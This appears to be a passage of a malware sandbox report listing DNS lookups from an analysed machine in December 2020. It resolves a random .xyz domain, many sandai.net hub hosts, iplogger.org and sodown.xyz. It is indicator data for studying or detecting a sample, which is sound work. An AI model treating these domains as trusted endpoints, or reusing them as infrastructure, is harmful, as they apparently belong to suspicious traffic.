                                                                                                                                                  Dec 5, 2020 08:43:43.599741936 CET8.8.8.8192.168.2.30xdb46No error (0)EF6DF4AF06BA6896.xyz104.28.4.129A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:43.599741936 CET8.8.8.8192.168.2.30xdb46No error (0)EF6DF4AF06BA6896.xyz104.28.5.129A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:43.599741936 CET8.8.8.8192.168.2.30xdb46No error (0)EF6DF4AF06BA6896.xyz172.67.194.30A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)hub5pn.hz.sandai.nethub5pn.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)hub5pn.sandai.netcnc.hub5pn.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net153.3.232.174A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net157.255.225.49A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net211.91.242.37A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net157.255.225.53A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net111.206.4.164A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net153.3.232.175A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net58.144.251.1A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net118.212.146.20A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net118.212.146.21A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net111.206.4.176A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net58.144.251.2A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net211.91.242.38A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.481640100 CET8.8.8.8192.168.2.30x79fcNo error (0)hub5pnc.hz.sandai.nethub5pnc.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.481640100 CET8.8.8.8192.168.2.30x79fcNo error (0)hub5pnc.sandai.netcnc.hub5pnc.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.481640100 CET8.8.8.8192.168.2.30x79fcNo error (0)cnc.hub5pnc.sandai.net47.92.99.221A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.481640100 CET8.8.8.8192.168.2.30x79fcNo error (0)cnc.hub5pnc.sandai.net47.92.100.53A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.542771101 CET8.8.8.8192.168.2.30x7c4No error (0)hubstat.hz.sandai.nethubstat.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.542771101 CET8.8.8.8192.168.2.30x7c4No error (0)hubstat.sandai.netcnchubstat.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.542771101 CET8.8.8.8192.168.2.30x7c4No error (0)cnchubstat.sandai.net140.206.225.136A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.542771101 CET8.8.8.8192.168.2.30x7c4No error (0)cnchubstat.sandai.net140.206.225.232A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.815103054 CET8.8.8.8192.168.2.30x7c3No error (0)hub5idx.shub.hz.sandai.nethub5t.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.815103054 CET8.8.8.8192.168.2.30x7c3No error (0)hub5t.sandai.nethub4t.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.815103054 CET8.8.8.8192.168.2.30x7c3No error (0)hub4t.sandai.netcnchub5sr.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.815103054 CET8.8.8.8192.168.2.30x7c3No error (0)cnchub5sr.sandai.netcncidx.m.hub.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.815103054 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.64A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.815103054 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net123.125.221.72A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.815103054 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net123.125.221.6A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.815103054 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net123.125.221.44A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.815103054 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.40A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.815103054 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.154A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.870011091 CET8.8.8.8192.168.2.30x7c0No error (0)hub5c.hz.sandai.nethub5c.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.870011091 CET8.8.8.8192.168.2.30x7c0No error (0)hub5c.sandai.nethub4t.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.870011091 CET8.8.8.8192.168.2.30x7c0No error (0)hub4t.sandai.netcnchub5sr.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.870011091 CET8.8.8.8192.168.2.30x7c0No error (0)cnchub5sr.sandai.netcncidx.m.hub.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.870011091 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net123.125.221.44A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.870011091 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.64A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.870011091 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.154A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.870011091 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.40A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.870011091 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net123.125.221.6A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.870011091 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net123.125.221.72A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.884772062 CET8.8.8.8192.168.2.30x600aNo error (0)hub5u.hz.sandai.nethub5u.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.884772062 CET8.8.8.8192.168.2.30x600aNo error (0)hub5u.sandai.netbgphub5u.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.884772062 CET8.8.8.8192.168.2.30x600aNo error (0)bgphub5u.sandai.net39.98.57.143A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.884772062 CET8.8.8.8192.168.2.30x600aNo error (0)bgphub5u.sandai.net47.92.75.245A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.884772062 CET8.8.8.8192.168.2.30x600aNo error (0)bgphub5u.sandai.net39.100.9.39A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.894771099 CET8.8.8.8192.168.2.30x7c2No error (0)dream.pics8.208.85.95A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.920553923 CET8.8.8.8192.168.2.30x7c1No error (0)pmap.hz.sandai.netpmap.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.920553923 CET8.8.8.8192.168.2.30x7c1No error (0)pmap.sandai.net47.97.7.140A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.921921015 CET8.8.8.8192.168.2.30xf80fName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.959666014 CET8.8.8.8192.168.2.30x6951Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:47.500004053 CET8.8.8.8192.168.2.30xe8e2Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.046248913 CET8.8.8.8192.168.2.30x1a3aName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.150399923 CET8.8.8.8192.168.2.30x7c5No error (0)hub5sr.shub.hz.sandai.nethub5t.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.150399923 CET8.8.8.8192.168.2.30x7c5No error (0)hub5t.sandai.nethub4t.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.150399923 CET8.8.8.8192.168.2.30x7c5No error (0)hub4t.sandai.netcnchub5sr.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.150399923 CET8.8.8.8192.168.2.30x7c5No error (0)cnchub5sr.sandai.netcncidx.m.hub.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.150399923 CET8.8.8.8192.168.2.30x7c5No error (0)cncidx.m.hub.sandai.net112.64.218.64A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.150399923 CET8.8.8.8192.168.2.30x7c5No error (0)cncidx.m.hub.sandai.net123.125.221.44A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.150399923 CET8.8.8.8192.168.2.30x7c5No error (0)cncidx.m.hub.sandai.net112.64.218.40A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.150399923 CET8.8.8.8192.168.2.30x7c5No error (0)cncidx.m.hub.sandai.net112.64.218.154A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.150399923 CET8.8.8.8192.168.2.30x7c5No error (0)cncidx.m.hub.sandai.net123.125.221.6A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.150399923 CET8.8.8.8192.168.2.30x7c5No error (0)cncidx.m.hub.sandai.net123.125.221.72A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.467833042 CET8.8.8.8192.168.2.30x7c8Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.504851103 CET8.8.8.8192.168.2.30x7c8Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.506387949 CET8.8.8.8192.168.2.30xfb24Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.534665108 CET8.8.8.8192.168.2.30x7c6No error (0)hub5pr.hz.sandai.nethub5pr.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.534665108 CET8.8.8.8192.168.2.30x7c6No error (0)hub5pr.sandai.netbgphub5pr.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.534665108 CET8.8.8.8192.168.2.30x7c6No error (0)bgphub5pr.sandai.net47.92.39.6A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.534665108 CET8.8.8.8192.168.2.30x7c6No error (0)bgphub5pr.sandai.net47.92.169.85A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.534665108 CET8.8.8.8192.168.2.30x7c6No error (0)bgphub5pr.sandai.net47.92.195.246A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.534665108 CET8.8.8.8192.168.2.30x7c6No error (0)bgphub5pr.sandai.net47.92.194.216A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.534665108 CET8.8.8.8192.168.2.30x7c6No error (0)bgphub5pr.sandai.net47.92.171.207A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.534665108 CET8.8.8.8192.168.2.30x7c6No error (0)bgphub5pr.sandai.net47.92.125.145A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.541173935 CET8.8.8.8192.168.2.30x7c7Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.542056084 CET8.8.8.8192.168.2.30x7c8Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.576889992 CET8.8.8.8192.168.2.30x7c7Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.578296900 CET8.8.8.8192.168.2.30x5596Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.593235016 CET8.8.8.8192.168.2.30x7b6aName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.614557981 CET8.8.8.8192.168.2.30x7c7Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.616168976 CET8.8.8.8192.168.2.30x88b9Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.654295921 CET8.8.8.8192.168.2.30x7c7Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.654336929 CET8.8.8.8192.168.2.30xe1d0Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.681833982 CET8.8.8.8192.168.2.30x7c7Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.691803932 CET8.8.8.8192.168.2.30x6fbName error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.727684975 CET8.8.8.8192.168.2.30x7c7Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.729172945 CET8.8.8.8192.168.2.30x621fName error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.141067982 CET8.8.8.8192.168.2.30xfec2Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.545767069 CET8.8.8.8192.168.2.30xeaf4Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.582858086 CET8.8.8.8192.168.2.30x20dbName error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.678586006 CET8.8.8.8192.168.2.30xb67Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.899038076 CET8.8.8.8192.168.2.30xeaf4Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.931978941 CET8.8.8.8192.168.2.30x7c8Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.967845917 CET8.8.8.8192.168.2.30x7c8Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.969422102 CET8.8.8.8192.168.2.30xe49bName error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.998538971 CET8.8.8.8192.168.2.30x7c8Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:50.009165049 CET8.8.8.8192.168.2.30x709aName error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:50.218580008 CET8.8.8.8192.168.2.30xd672Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:50.766110897 CET8.8.8.8192.168.2.30x7fcdName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:51.312589884 CET8.8.8.8192.168.2.30x2599Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:51.858886957 CET8.8.8.8192.168.2.30x1fafName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:52.444046021 CET8.8.8.8192.168.2.30x7d31Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:52.993534088 CET8.8.8.8192.168.2.30x3923Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:56.660892010 CET8.8.8.8192.168.2.30x7a6dNo error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:57.274240017 CET8.8.8.8192.168.2.30xd060No error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.839428902 CET8.8.8.8192.168.2.30x27c6No error (0)hub5pnc.hz.sandai.nethub5pnc.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.839428902 CET8.8.8.8192.168.2.30x27c6No error (0)hub5pnc.sandai.netcnc.hub5pnc.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.839428902 CET8.8.8.8192.168.2.30x27c6No error (0)cnc.hub5pnc.sandai.net47.92.99.221A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.839428902 CET8.8.8.8192.168.2.30x27c6No error (0)cnc.hub5pnc.sandai.net47.92.100.53A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)hub5pn.hz.sandai.nethub5pn.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)hub5pn.sandai.netcnc.hub5pn.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net153.3.232.174A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net157.255.225.49A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net211.91.242.37A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net157.255.225.53A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net111.206.4.164A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net153.3.232.175A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net58.144.251.1A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net118.212.146.20A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net118.212.146.21A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net111.206.4.176A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net58.144.251.2A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net211.91.242.38A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.881499052 CET8.8.8.8192.168.2.30xceb2No error (0)hub5u.hz.sandai.nethub5u.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.881499052 CET8.8.8.8192.168.2.30xceb2No error (0)hub5u.sandai.netbgphub5u.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.881499052 CET8.8.8.8192.168.2.30xceb2No error (0)bgphub5u.sandai.net39.100.9.39A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.881499052 CET8.8.8.8192.168.2.30xceb2No error (0)bgphub5u.sandai.net47.92.75.245A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.881499052 CET8.8.8.8192.168.2.30xceb2No error (0)bgphub5u.sandai.net39.98.57.143A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)hub5c.hz.sandai.nethub5c.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)hub5c.sandai.nethub4t.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)hub4t.sandai.netcnchub5sr.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)cnchub5sr.sandai.netcncidx.m.hub.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net123.125.221.44A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.64A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.154A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.40A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net123.125.221.6A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net123.125.221.72A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.899857998 CET8.8.8.8192.168.2.30x7c1No error (0)pmap.hz.sandai.netpmap.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.899857998 CET8.8.8.8192.168.2.30x7c1No error (0)pmap.sandai.net47.97.7.140A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.910778999 CET8.8.8.8192.168.2.30x7c2No error (0)www.sodown.xyz104.18.63.67A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.910778999 CET8.8.8.8192.168.2.30x7c2No error (0)www.sodown.xyz172.67.208.194A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.910778999 CET8.8.8.8192.168.2.30x7c2No error (0)www.sodown.xyz104.18.62.67A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.919802904 CET8.8.8.8192.168.2.30x8e07Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.921406031 CET8.8.8.8192.168.2.30x7c4No error (0)hubstat.hz.sandai.nethubstat.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.921406031 CET8.8.8.8192.168.2.30x7c4No error (0)hubstat.sandai.netcnchubstat.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.921406031 CET8.8.8.8192.168.2.30x7c4No error (0)cnchubstat.sandai.net140.206.225.136A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.921406031 CET8.8.8.8192.168.2.30x7c4No error (0)cnchubstat.sandai.net140.206.225.232A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.957159996 CET8.8.8.8192.168.2.30x1789Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)hub5idx.shub.hz.sandai.nethub5t.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)hub5t.sandai.nethub4t.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)hub4t.sandai.netcnchub5sr.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)cnchub5sr.sandai.netcncidx.m.hub.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net123.125.221.6A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.154A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.40A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.64A (IP address)IN (0x0001)
